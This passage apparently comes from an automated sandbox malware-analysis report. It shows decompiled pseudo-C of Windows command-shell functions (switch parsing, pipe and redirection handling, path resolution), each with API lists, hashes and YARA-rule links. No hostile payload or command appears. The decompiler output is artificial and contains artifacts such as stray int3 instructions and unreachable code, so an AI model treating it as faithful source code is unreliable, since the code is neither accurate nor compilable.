				while(_t53 <= _t35) {
					_t84 = _t84 + _t47;
					_t45 =  *_t84 & 0x0000ffff;
					_t53 = _t45;
					_t35 = 0x20;
					if(_t45 != 0) {
						continue;
					}
					break;
				}
				_t83 = 0;
				if( *_t84 == 0) {
					goto L26;
				}
				__imp___wcsnicmp(_t84, L"/A", _t47);
				if(_t35 == 0) {
					return E011D6052( &(_t84[2]));
				}
				__imp___wcsnicmp(_t84, L"/P", _t47);
				if(_t35 == 0) {
					return E011F474C(_t47,  &(_t84[2]), _t71, 0, _t84);
				}
				_t38 =  *_t84 & 0x0000ffff;
				if(_t38 == 0x2f) {
					goto L40;
				}
				_t81 = 0x22;
				if(_t38 == _t81) {
					_t85 = _t84 + _t47;
					_t39 =  *_t85 & 0x0000ffff;
					if(_t39 == 0) {
						L24:
						_t40 = wcsrchr(_t85, _t81);
						_pop(_t53);
						if(_t40 != 0) {
							_t53 = 0;
							 *_t40 = 0;
						}
						goto L11;
					}
					_t70 = _t39;
					_t82 = 0x20;
					while(_t70 <= _t82) {
						_t85 = _t85 + _t47;
						_t44 =  *_t85 & 0x0000ffff;
						_t70 = _t44;
						if(_t44 != 0) {
							continue;
						}
						break;
					}
					_t81 = 0x22;
					goto L24;
				}
				L11:
				_t41 = 0x3d;
				if( *_t85 == _t41) {
					goto L40;
				}
				_t42 = wcschr(_t85, _t41);
				if(_t42 == 0) {
					return E011F4588(_t85);
				}
				_t2 =  &(_t42[0]); // 0x2
				_t80 = _t2;
				 *_t42 = 0;
				goto L14;
			}





































                                                    0x011d5f86
                                                    0x011d5f8a
                                                    0x011ea9e9
                                                    0x011ea9eb
                                                    0x011ea9f0
                                                    0x011ea9cb
                                                    0x00000000
                                                    0x011ea9d1
                                                    0x011ea9f4
                                                    0x011ea9f6
                                                    0x011ea9f9
                                                    0x011ea9fa
                                                    0x011ea9fa
                                                    0x011ea9fc
                                                    0x011ea9ff
                                                    0x011eaa02
                                                    0x011eaa02
                                                    0x011eaa05
                                                    0x011eaa07
                                                    0x011eaa12
                                                    0x011eaa17
                                                    0x011eaa1a
                                                    0x011eaa1b
                                                    0x011eaa1e
                                                    0x011eaa26
                                                    0x011eaa7f
                                                    0x011eaa7f
                                                    0x011eaa80
                                                    0x011eaa85
                                                    0x00000000
                                                    0x011eaa8e
                                                    0x011eaa28
                                                    0x011eaa2a
                                                    0x011eaa2f
                                                    0x011eaa36
                                                    0x00000000
                                                    0x00000000
                                                    0x011eaa38
                                                    0x011eaa3b
                                                    0x011eaa3b
                                                    0x011eaa3e
                                                    0x011eaa40
                                                    0x011eaa49
                                                    0x011eaa5a
                                                    0x011eaa5f
                                                    0x011eaa61
                                                    0x011eaa61
                                                    0x011eaa64
                                                    0x011eaa64
                                                    0x011eaa67
                                                    0x011eaa69
                                                    0x011eaa6e
                                                    0x011eaa70
                                                    0x011eaa72
                                                    0x00000000
                                                    0x00000000
                                                    0x011eaa77
                                                    0x011d6031
                                                    0x00000000
                                                    0x011d6033
                                                    0x011d5f92
                                                    0x00000000
                                                    0x00000000
                                                    0x011d5f98
                                                    0x011d5f9e
                                                    0x00000000
                                                    0x00000000
                                                    0x011d5fa6
                                                    0x011d5fa8
                                                    0x011d5fab
                                                    0x011d5fac
                                                    0x011d5fb1
                                                    0x011d5fb5
                                                    0x011d5fb8
                                                    0x011d5fbd
                                                    0x011d5fbe
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x011d5fbe
                                                    0x011d5fc0
                                                    0x011d5fc5
                                                    0x00000000
                                                    0x00000000
                                                    0x011d5fd2
                                                    0x011d5fdd
                                                    0x00000000
                                                    0x011d6042
                                                    0x011d5fe6
                                                    0x011d5ff1
                                                    0x00000000
                                                    0x011ea982
                                                    0x011d5ff7
                                                    0x011d5ffd
                                                    0x00000000
                                                    0x00000000
                                                    0x011d6005
                                                    0x011d6009
                                                    0x011ea98c
                                                    0x011ea98e
                                                    0x011ea994
                                                    0x011ea9af
                                                    0x011ea9b1
                                                    0x011ea9b8
                                                    0x011ea9bb
                                                    0x011ea9c1
                                                    0x011ea9c3
                                                    0x011ea9c3
                                                    0x00000000
                                                    0x011ea9bb
                                                    0x011ea998
                                                    0x011ea99a
                                                    0x011ea99b
                                                    0x011ea9a0
                                                    0x011ea9a2
                                                    0x011ea9a5
                                                    0x011ea9aa
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x011ea9aa
                                                    0x011ea9ae
                                                    0x00000000
                                                    0x011ea9ae
                                                    0x011d600f
                                                    0x011d6011
                                                    0x011d6015
                                                    0x00000000
                                                    0x00000000
                                                    0x011d601d
                                                    0x011d6027
                                                    0x00000000
                                                    0x011d604b
                                                    0x011d602b
                                                    0x011d602b
                                                    0x011d602e
                                                    0x00000000

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.913116330.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                    • Associated: 00000015.00000002.913190282.0000000001219000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000015.00000002.913210919.000000000121D000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID: _wcsnicmp$wcschr
                                                    • String ID:
                                                    • API String ID: 3270668897-0
                                                    • Opcode ID: 6882690f09108301da322c924d95972048bff093752235bb1f516b1b17fecf5e
                                                    • Instruction ID: e21ea13337b8509a8886dbc2996baa5dbb390130eee3705bd4618ba193e3823a
                                                    • Opcode Fuzzy Hash: 6882690f09108301da322c924d95972048bff093752235bb1f516b1b17fecf5e
                                                    • Instruction Fuzzy Hash: 35519E39200A119BEB2CEBACA86867F77F1EF94644B55445DE8439B2C1FB714E82C391
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 011DAF70, Relevance: 6.2, APIs: 4, Instructions: 179COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 59%
                                                    			E011DAF70(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
				char _v8;
				intOrPtr _t39;
				void** _t40;
				void* _t42;
				signed int _t46;
				void* _t48;
				void* _t50;
				intOrPtr _t54;
				void* _t60;
				void* _t62;
				void* _t65;
				void* _t68;
				long _t75;
				void* _t78;
				signed int _t83;
				void* _t87;
				signed int _t102;
				long _t114;
				void* _t116;
				void* _t117;
				void** _t119;

				_push(__ecx);
				_t39 = _a4;
				_t114 =  *((intOrPtr*)(_t39 + 0x38));
				_t75 =  *((intOrPtr*)(_t39 + 0x3c));
				_t78 = 0x28;
				_t40 = E011E00B0(_t78);
				_t119 = _t40;
				if(_t119 == 0) {
					L27:
					_t42 = 1;
				} else {
					__imp___pipe(_t119, 0, 0x8000);
					if(_t40 != 0) {
						_push(0);
						_push(8);
						E011DC5A2(_t78);
						goto L27;
					} else {
						E011DB15E( *_t119);
						E011DB15E(_t119[1]);
						_t46 =  *0x11fd550; // 0x0
						_t83 = _t46;
						 *0x11fd550 = _t46 + 1;
						if(_t83 != 0) {
							_t48 =  *0x11fd5c0; // 0x0
							 *(_t48 + 0x24) = _t119;
							_t119[9] = _t119[9] & 0x00000000;
							_t119[8] = _t48;
						} else {
							_t119[8] = _t119[8] & _t83;
							 *0x11fd5c4 = _t119;
						}
						_t85 = 1;
						 *0x11fd5c0 = _t119;
						_t50 = E011DDBCE(_t119, 1);
						_t119[3] = _t50;
						if(_t50 == 0xffffffff) {
							_t119[3] = _t119[3] | 0xffffffff;
							L23:
							_push(0);
							L31:
							E011DC5A2(_t85);
							_t87 = 0x2351;
							L32:
							E011F9287(_t87);
							__imp__longjmp(0x120b8b8, 1);
							asm("int3");
							_t102 = (_t87 - 0x20 >> 5) + 1;
							_t54 =  *((intOrPtr*)(0x11fd5d0 + _t102 * 4));
							asm("bts eax, ecx");
							 *((intOrPtr*)(0x11fd5d0 + _t102 * 4)) = _t54;
							return _t54;
						}
						_t85 = _t119[1];
						if(E011DDBFC(_t119[1], 1) == 0xffffffff) {
							goto L23;
						}
						E011DDB92(_t119[1]);
						_t119[1] = _t119[1] & 0x00000000;
						if( *_t114 <= 0) {
							E011DE040(_t114,  &_v8);
						}
						_t116 = E011E0E00(1, _t114);
						if( *0x11fd54c != 0) {
							__imp___get_osfhandle(1);
							DuplicateHandle( *0x11fd54c, 0,  *_t119, 0, 0, 0, 0);
						}
						_t85 = _t119[3];
						if(E011DDBFC(_t119[3], 1) == 0xffffffff) {
							goto L23;
						}
						_t87 = _t119[3];
						E011DDB92(_t87);
						_t119[3] = _t119[3] & 0x00000000;
						if(_t116 != 0) {
							goto L32;
						}
						_t60 =  *0x11fd54c; // 0x0
						_t85 = 0;
						_t119[4] = _t60;
						_t119[6] =  *0x1203838;
						 *0x11fd54c = _t116;
						 *0x1203838 = _t116;
						_t62 = E011DDBCE( *0x1203838, 0);
						_t119[2] = _t62;
						if(_t62 == 0xffffffff) {
							_t119[2] = _t119[2] | 0xffffffff;
							L30:
							_push(_t116);
							goto L31;
						}
						_t85 =  *_t119;
						if(E011DDBFC( *_t119, 0) == 0xffffffff) {
							goto L30;
						}
						E011DDB92( *_t119);
						 *_t119 = _t116;
						if( *_t75 <= _t116) {
							E011DE040(_t75,  &_v8);
						}
						_t65 = E011E0E00(1, _t75);
						_t85 = _t119[2];
						_t117 = _t65;
						if(E011DDBFC(_t119[2], 0) == 0xffffffff) {
							goto L23;
						}
						E011DDB92(_t119[2]);
						_t87 = 0;
						_t119[2] = 0;
						if(_t117 != 0) {
							goto L32;
						}
						 *0x11fd550 =  *0x11fd550 - 1;
						_t68 =  *0x11fd54c; // 0x0
						_t119[5] = _t68;
						_t119[7] =  *0x1203838;
						 *0x11fd54c = 0;
						 *0x1203838 = 0;
						if( *0x11fd550 != 0) {
							_t42 = 0;
						} else {
							_t42 = E011DB183();
						}
					}
				}
				return _t42;
			}
























                                                    0x011daf78
                                                    0x011daf79
                                                    0x011daf7f
                                                    0x011daf82
                                                    0x011daf87
                                                    0x011daf88
                                                    0x011daf8d
                                                    0x011daf91
                                                    0x011f12c3
                                                    0x011f12c5
                                                    0x011daf97
                                                    0x011daf9f
                                                    0x011dafaa
                                                    0x011f12b8
                                                    0x011f12ba
                                                    0x011f12bc
                                                    0x00000000
                                                    0x011dafb0
                                                    0x011dafb2
                                                    0x011dafba
                                                    0x011dafbf
                                                    0x011dafc4
                                                    0x011dafc7
                                                    0x011dafce
                                                    0x011db13f
                                                    0x011db144
                                                    0x011db147
                                                    0x011db14b
                                                    0x011dafd4
                                                    0x011dafd4
                                                    0x011dafd7
                                                    0x011dafd7
                                                    0x011dafe1
                                                    0x011dafe2
                                                    0x011dafe7
                                                    0x011dafec
                                                    0x011daff2
                                                    0x011f12cb
                                                    0x011db157
                                                    0x011db157
                                                    0x011f12d9
                                                    0x011f12de
                                                    0x011f12e4
                                                    0x011f12e5
                                                    0x011f12e5
                                                    0x011f12f1
                                                    0x011f12f7
                                                    0x011f12fe
                                                    0x011db171
                                                    0x011db178
                                                    0x011db17b
                                                    0x00000000
                                                    0x011db17b
                                                    0x011daff8
                                                    0x011db006
                                                    0x00000000
                                                    0x00000000
                                                    0x011db00f
                                                    0x011db014
                                                    0x011db01b
                                                    0x011db023
                                                    0x011db023
                                                    0x011db039
                                                    0x011db03b
                                                    0x011db047
                                                    0x011db055
                                                    0x011db055
                                                    0x011db05b
                                                    0x011db069
                                                    0x00000000
                                                    0x00000000
                                                    0x011db06f
                                                    0x011db072
                                                    0x011db077
                                                    0x011db07d
                                                    0x00000000
                                                    0x00000000
                                                    0x011db083
                                                    0x011db088
                                                    0x011db08a
                                                    0x011db092
                                                    0x011db095
                                                    0x011db09b
                                                    0x011db0a1
                                                    0x011db0a6
                                                    0x011db0ac
                                                    0x011f12d4
                                                    0x011f12d8
                                                    0x011f12d8
                                                    0x00000000
                                                    0x011f12d8
                                                    0x011db0b2
                                                    0x011db0be
                                                    0x00000000
                                                    0x00000000
                                                    0x011db0c6
                                                    0x011db0cb
                                                    0x011db0cf
                                                    0x011db0d7
                                                    0x011db0d7
                                                    0x011db0e1
                                                    0x011db0e6
                                                    0x011db0eb
                                                    0x011db0f5
                                                    0x00000000
                                                    0x00000000
                                                    0x011db0fa
                                                    0x011db0ff
                                                    0x011db101
                                                    0x011db106
                                                    0x00000000
                                                    0x00000000
                                                    0x011db10c
                                                    0x011db113
                                                    0x011db118
                                                    0x011db120
                                                    0x011db123
                                                    0x011db129
                                                    0x011db12f
                                                    0x011db153
                                                    0x011db131
                                                    0x011db131
                                                    0x011db131
                                                    0x011db12f
                                                    0x011dafaa
                                                    0x011db13c

                                                    APIs
                                                      • Part of subcall function 011E00B0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,011DDF68,00000001,?,00000000,011E3458,-00000105,011FBDD8,00000240,011E4B82,00000000,00000000,011EAE6E,00000000), ref: 011E00C1
                                                      • Part of subcall function 011E00B0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,011DDF68,00000001,?,00000000,011E3458,-00000105,011FBDD8,00000240,011E4B82,00000000,00000000,011EAE6E,00000000,?), ref: 011E00C8
                                                    • _pipe.MSVCRT ref: 011DAF9F
                                                      • Part of subcall function 011DDBCE: _dup.MSVCRT ref: 011DDBD5
                                                    • longjmp.MSVCRT(0120B8B8,00000001), ref: 011F12F1
                                                      • Part of subcall function 011DDBFC: _dup2.MSVCRT ref: 011DDC10
                                                      • Part of subcall function 011DDB92: _close.MSVCRT ref: 011DDBC1
                                                    • _get_osfhandle.MSVCRT ref: 011DB047
                                                    • DuplicateHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(00000000), ref: 011DB055
                                                      • Part of subcall function 011DE040: memset.MSVCRT ref: 011DE090
                                                      • Part of subcall function 011DE040: wcschr.MSVCRT ref: 011DE0F3
                                                      • Part of subcall function 011DE040: wcschr.MSVCRT ref: 011DE10B
                                                      • Part of subcall function 011DE040: _wcsicmp.MSVCRT ref: 011DE179
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.913116330.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                    • Associated: 00000015.00000002.913190282.0000000001219000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000015.00000002.913210919.000000000121D000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID: Heapwcschr$AllocDuplicateHandleProcess_close_dup_dup2_get_osfhandle_pipe_wcsicmplongjmpmemset
                                                    • String ID:
                                                    • API String ID: 1441200171-0
                                                    • Opcode ID: 6cad21d06427e9c0ae52906e1e5b7ca901d78b711cd73aa69c338ffce1a03d55
                                                    • Instruction ID: 4adc1ec5e026a01e762791da8a3d31ae191c7c722cd5859a0596a3743e8a29b3
                                                    • Opcode Fuzzy Hash: 6cad21d06427e9c0ae52906e1e5b7ca901d78b711cd73aa69c338ffce1a03d55
                                                    • Instruction Fuzzy Hash: CC51BF746047019FDB3CDF79E899A3A77E1EB95328B108A2EE46BC72D4DB30A441CB45
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 011E02B0, Relevance: 6.2, APIs: 4, Instructions: 165COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 88%
                                                    			E011E02B0(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi) {
				intOrPtr _v8;
				void* _v16;
				signed short* _v20;
				signed short _v24;
				signed short _t29;
				signed int _t30;
				intOrPtr _t31;
				int _t34;
				intOrPtr* _t36;
				intOrPtr _t39;
				int _t47;
				intOrPtr _t48;
				intOrPtr* _t59;
				intOrPtr* _t63;
				signed short _t69;
				signed short* _t70;
				intOrPtr* _t71;
				signed short _t76;
				intOrPtr* _t77;
				signed short _t83;
				void* _t91;
				void* _t95;

				_v8 =  *((intOrPtr*)(_t91 + 4));
				_t95 = (_t91 - 0x00000008 & 0xfffffff8) + 4 - 0x10;
				_t83 = 0;
				_v16 = __ecx;
				_v24 = 0;
				while(1) {
					_t69 =  *0x120faa0;
					_t29 = _t69 & 0x0000ffff;
					_t76 = _t29;
					_v20 = _t29;
					_t30 = _t76 & 0x0000ffff;
					if(_t30 == 0x3e || _t30 == 0x3c) {
						goto L7;
					}
					_t41 = iswdigit(_t69 & 0x0000ffff);
					_t95 = _t95 + 4;
					if(_t41 != 0) {
						_t76 =  *0x120faa2;
						_t41 = _t76 & 0x0000ffff;
						if(_t41 != 0x3e) {
							if(_t41 == 0x3c) {
								goto L7;
							} else {
								goto L4;
							}
						} else {
							goto L7;
						}
					} else {
						L4:
						if(_t83 != 0) {
							if(_v24 == _t83) {
								E011DF300(_t41, 0, 0, 0);
							}
							return 1;
						} else {
							return 0;
						}
					}
					L40:
					L7:
					_t31 = E011E00B0(0x18);
					_t59 = _v16;
					 *_t59 = _t31;
					if(_t31 == 0) {
						 *0x120f980 = 0x234a;
						__imp__longjmp(0x120b940, 1);
						asm("int3");
						if(_t59 <= 0xc42e || _t59 == 0xc431 || _t59 == 0xc433) {
							_t69 = 0;
						}
						return _t69;
					} else {
						 *(_t31 + 0x10) = _t76;
						_t83 = _t83 + 1;
						_v20 = 0x120faa0;
						_t34 = iswdigit( *0x120faa0 & 0x0000ffff);
						_t95 = _t95 + 4;
						_t36 =  *_v16;
						if(_t34 != 0) {
							 *_t36 = ( *0x120faa0 & 0x0000ffff) - 0x30;
							_t63 = 0x120faa2;
						} else {
							_t63 = _v20;
							if(_t76 != 0x3e) {
								 *_t36 = 0;
							} else {
								 *_t36 = 1;
							}
						}
						_t11 = _t63 + 2; // 0x120faa4
						_t70 = _t11;
						_v20 = _t70;
						if( *_t63 !=  *_t70) {
							_t77 = _v16;
						} else {
							if(_t76 == 0x3c) {
								E011F82EB(_t63);
								_t70 = _v20;
							}
							_t77 = _v16;
							_t63 = _t70;
							 *((intOrPtr*)( *_t77 + 0xc)) = 1;
						}
						_t64 = _t63 + 2;
						_v20 = _t64;
						if( *_t64 == 0x26) {
							_t71 = _t64;
							_t22 = _t71 + 2; // 0x120faa2
							_v16 = _t22;
							do {
								_t39 =  *_t71;
								_t71 = _t71 + 2;
							} while (_t39 != 0);
							if(_t71 - _v16 >> 1 != 2) {
								L28:
								E011F82EB(_t64);
							} else {
								_t47 = iswdigit( *(_t64 + 2) & 0x0000ffff);
								_t95 = _t95 + 4;
								if(_t47 == 0) {
									goto L28;
								} else {
									_t48 = E011DDF40(_v20);
									_t64 =  *_t77;
									 *((intOrPtr*)( *_t77 + 4)) = _t48;
									if(_t48 == 0) {
										goto L28;
									}
								}
							}
						} else {
							 *((intOrPtr*)( *_t77 + 4)) = E011DDDCD(_t64);
						}
						if(E011DEEC8() == 0) {
							goto L4;
						} else {
							E011DF030(0);
							_v24 = _v24 + 1;
							_v16 =  *_t77 + 0x14;
							continue;
						}
					}
					goto L40;
				}
			}

























                                                    0x011e02c2
                                                    0x011e02c8
                                                    0x011e02cc
                                                    0x011e02ce
                                                    0x011e02d2
                                                    0x011e02e0
                                                    0x011e02e0
                                                    0x011e02e7
                                                    0x011e02ea
                                                    0x011e02ed
                                                    0x011e02f0
                                                    0x011e02f6
                                                    0x00000000
                                                    0x00000000
                                                    0x011e0301
                                                    0x011e0307
                                                    0x011e030c
                                                    0x011e0321
                                                    0x011e0328
                                                    0x011e032e
                                                    0x011ecad6
                                                    0x00000000
                                                    0x011ecadc
                                                    0x00000000
                                                    0x011ecadc
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x011e030e
                                                    0x011e030e
                                                    0x011e0310
                                                    0x011e03ec
                                                    0x011e03f4
                                                    0x011e03f4
                                                    0x011e0406
                                                    0x011e0316
                                                    0x011e0320
                                                    0x011e0320
                                                    0x011e0310
                                                    0x00000000
                                                    0x011e0334
                                                    0x011e0339
                                                    0x011e033e
                                                    0x011e0341
                                                    0x011e0345
                                                    0x011ecb00
                                                    0x011ecb0a
                                                    0x011ecb10
                                                    0x011ecb17
                                                    0x011e065e
                                                    0x011e065e
                                                    0x011e065d
                                                    0x011e034b
                                                    0x011e034b
                                                    0x011e035b
                                                    0x011e035d
                                                    0x011e0360
                                                    0x011e0366
                                                    0x011e036e
                                                    0x011e0370
                                                    0x011e0416
                                                    0x011e0418
                                                    0x011e0376
                                                    0x011e0376
                                                    0x011e037d
                                                    0x011ecae1
                                                    0x011e0383
                                                    0x011e0383
                                                    0x011e0383
                                                    0x011e037d
                                                    0x011e038c
                                                    0x011e038c
                                                    0x011e038f
                                                    0x011e0395
                                                    0x011e0407
                                                    0x011e0397
                                                    0x011e039b
                                                    0x011ecaec
                                                    0x011ecaf1
                                                    0x011ecaf1
                                                    0x011e03a1
                                                    0x011e03a4
                                                    0x011e03a8
                                                    0x011e03a8
                                                    0x011e03af
                                                    0x011e03b2
                                                    0x011e03b9
                                                    0x011e0422
                                                    0x011e0424
                                                    0x011e0427
                                                    0x011e0430
                                                    0x011e0430
                                                    0x011e0433
                                                    0x011e0436
                                                    0x011e0443
                                                    0x011e046c
                                                    0x011e046c
                                                    0x011e0445
                                                    0x011e044a
                                                    0x011e0450
                                                    0x011e0455
                                                    0x00000000
                                                    0x011e0457
                                                    0x011e045a
                                                    0x011e045f
                                                    0x011e0461
                                                    0x011e0466
                                                    0x00000000
                                                    0x00000000
                                                    0x011e0466
                                                    0x011e0455
                                                    0x011e03bb
                                                    0x011e03c2
                                                    0x011e03c2
                                                    0x011e03cc
                                                    0x00000000
                                                    0x011e03d2
                                                    0x011e03d4
                                                    0x011e03de
                                                    0x011e03e1
                                                    0x00000000
                                                    0x011e03e1
                                                    0x011e03cc
                                                    0x00000000
                                                    0x011e0345

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.913116330.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                    • Associated: 00000015.00000002.913190282.0000000001219000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000015.00000002.913210919.000000000121D000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID: iswdigit
                                                    • String ID:
                                                    • API String ID: 3849470556-0
                                                    • Opcode ID: 56c411d0bb0143154565cf3f04d095eab591efeb6e4135075c6b1875747ee49d
                                                    • Instruction ID: d09a34828198d013f7ac1bce7e74096f6f9a04199d44658a5ec333314f793b97
                                                    • Opcode Fuzzy Hash: 56c411d0bb0143154565cf3f04d095eab591efeb6e4135075c6b1875747ee49d
                                                    • Instruction Fuzzy Hash: 4C51D470A046019FDB2DDFE9D59827EB7E1EB88304F15416AE90187381EBB59A82CB91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 011E2D22, Relevance: 6.1, APIs: 4, Instructions: 119COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 96%
                                                    			E011E2D22(intOrPtr* __ecx, long __edx, WCHAR* _a4) {
				long _v8;
				WCHAR* _v12;
				void* __ebx;
				intOrPtr _t30;
				void* _t31;
				intOrPtr _t35;
				short _t38;
				signed short _t40;
				int _t41;
				long _t46;
				intOrPtr _t49;
				short _t50;
				int _t53;
				intOrPtr* _t60;
				signed int _t62;
				signed short* _t63;
				intOrPtr* _t68;
				signed int _t70;
				void* _t72;
				void* _t75;
				signed short* _t76;
				void* _t78;
				WCHAR* _t80;
				long _t82;
				intOrPtr* _t84;
				signed int _t86;
				signed short* _t87;

				_push(__ecx);
				_push(__ecx);
				_t80 = __ecx;
				_v8 = __edx;
				_t57 = _a4;
				_t53 = 0;
				_t84 = _a4;
				_t3 = _t84 + 2; // 0x2
				_t72 = _t3;
				do {
					_t30 =  *_t84;
					_t84 = _t84 + 2;
				} while (_t30 != 0);
				_t86 = _t84 - _t72 >> 1;
				_t31 = E011E22C0(0, _t57);
				_t4 = _t86 + 1; // -1
				_t87 = _a4;
				E011E1040(_t87, _t4, _t31);
				if(( *_t87 & 0x0000ffff) == 0) {
					E011E36CB(0, __ecx, _v8, 0);
					_t60 = __ecx + 4;
					_t75 = _t60 + 2;
					do {
						_t35 =  *_t60;
						_t60 = _t60 + 2;
					} while (_t35 != 0);
					_t62 = _t60 - _t75 >> 1;
					if(_t62 + 3 < 0x7fe7) {
						if(_t62 != 1) {
							_t38 = 0x5c;
							 *((short*)(__ecx + 4 + _t62 * 2)) = _t38;
							 *((short*)(__ecx + 6 + _t62 * 2)) = 0;
						}
						goto L8;
					}
					 *0x1213cf0 = 3;
					goto L21;
				} else {
					_t63 = _t87;
					_t6 =  &(_t63[1]); // 0x2
					_t76 = _t6;
					do {
						_t40 =  *_t63;
						_t63 =  &(_t63[1]);
					} while (_t40 != 0);
					if(_t63 - _t76 >> 1 == 2) {
						if(_t87[1] != 0x3a) {
							goto L6;
						}
						E011E36CB(0, __ecx, _v8,  *_t87 & 0x0000ffff);
						_t68 = __ecx;
						_t78 = __ecx + 2;
						do {
							_t49 =  *_t68;
							_t68 = _t68 + 2;
						} while (_t49 != 0);
						_t70 = _t68 - _t78 >> 1;
						if(_t70 > 3) {
							_t50 = 0x5c;
							 *((short*)(__ecx + _t70 * 2)) = _t50;
							 *((short*)(__ecx + 2 + _t70 * 2)) = 0;
						}
						L8:
						return _t53;
					}
					L6:
					_t41 = SetErrorMode(_t53);
					SetErrorMode(1);
					_t82 = _v8;
					_v8 = GetFullPathNameW(_a4, _t82, _t80,  &_v12);
					SetErrorMode(_t41);
					_t46 = _v8;
					if(_t46 == 0 || _t46 > _t82) {
						 *0x1213cf0 = 0xce;
						L21:
						_t53 = 1;
					}
					goto L8;
				}
			}






























                                                    0x011e2d27
                                                    0x011e2d28
                                                    0x011e2d2c
                                                    0x011e2d2e
                                                    0x011e2d31
                                                    0x011e2d34
                                                    0x011e2d36
                                                    0x011e2d38
                                                    0x011e2d38
                                                    0x011e2d3b
                                                    0x011e2d3b
                                                    0x011e2d3e
                                                    0x011e2d41
                                                    0x011e2d48
                                                    0x011e2d4a
                                                    0x011e2d4f
                                                    0x011e2d52
                                                    0x011e2d58
                                                    0x011e2d63
                                                    0x011ed8ed
                                                    0x011ed8f2
                                                    0x011ed8f5
                                                    0x011ed8f8
                                                    0x011ed8f8
                                                    0x011ed8fb
                                                    0x011ed8fe
                                                    0x011ed905
                                                    0x011ed90f
                                                    0x011ed920
                                                    0x011ed928
                                                    0x011ed929
                                                    0x011ed930
                                                    0x011ed930
                                                    0x00000000
                                                    0x011ed920
                                                    0x011ed911
                                                    0x00000000
                                                    0x011e2d69
                                                    0x011e2d69
                                                    0x011e2d6b
                                                    0x011e2d6b
                                                    0x011e2d6e
                                                    0x011e2d6e
                                                    0x011e2d71
                                                    0x011e2d74
                                                    0x011e2d80
                                                    0x011ed93f
                                                    0x00000000
                                                    0x00000000
                                                    0x011ed94e
                                                    0x011ed953
                                                    0x011ed955
                                                    0x011ed958
                                                    0x011ed958
                                                    0x011ed95b
                                                    0x011ed95e
                                                    0x011ed965
                                                    0x011ed96a
                                                    0x011ed972
                                                    0x011ed973
                                                    0x011ed979
                                                    0x011ed979
                                                    0x011e2dc7
                                                    0x011e2dcf
                                                    0x011e2dcf
                                                    0x011e2d86
                                                    0x011e2d87
                                                    0x011e2d91
                                                    0x011e2d9f
                                                    0x011e2dab
                                                    0x011e2dae
                                                    0x011e2db4
                                                    0x011e2db9
                                                    0x011ed983
                                                    0x011ed98d
                                                    0x011ed98f
                                                    0x011ed98f
                                                    0x00000000
                                                    0x011e2db9

                                                    APIs
                                                    • SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,00000000,?,00000000,00000000,?,?,?,011E3C29,?,00000000,-00000001,00000000,?,00000000), ref: 011E2D87
                                                    • SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000001,?,011E3C29,?,00000000,-00000001,00000000,?,00000000), ref: 011E2D91
                                                    • GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,-00000001,?,00000000,?,011E3C29,?,00000000,-00000001,00000000,?,00000000), ref: 011E2DA4
                                                    • SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,011E3C29,?,00000000,-00000001,00000000,?,00000000), ref: 011E2DAE
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.913116330.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                    • Associated: 00000015.00000002.913190282.0000000001219000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000015.00000002.913210919.000000000121D000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID: ErrorMode$FullNamePath
                                                    • String ID:
                                                    • API String ID: 268959451-0
                                                    • Opcode ID: f3d49440b11c6ae843187889818cca761bb1577a1bf445bedffb8b356851c5b0
                                                    • Instruction ID: 4966c4f414c69bd40c7ef73025f77b80acc0af26ced68ebd90731c41d3a9fc39
                                                    • Opcode Fuzzy Hash: f3d49440b11c6ae843187889818cca761bb1577a1bf445bedffb8b356851c5b0
                                                    • Instruction Fuzzy Hash: B4414639500501ABCF2CDFE8D8698BEB7EEFF88704714851DEA06C7244E771AA41C790
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 011DEEF0, Relevance: 6.1, APIs: 4, Instructions: 94memoryCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 84%
                                                    			E011DEEF0(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				void* __ebx;
				intOrPtr _t8;
				signed int _t9;
				intOrPtr _t12;
				void* _t18;
				intOrPtr _t23;
				signed int _t25;
				void* _t32;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;
				intOrPtr* _t36;

				_t8 =  *0x1213cd8;
				_t34 = _a4;
				_t23 = __edx;
				_t33 = __ecx;
				 *0x120f980 = __ecx;
				if(_t8 <= _t34) {
					L4:
					_t35 = 0;
					_t9 = 0;
					_t25 = 0;
					do {
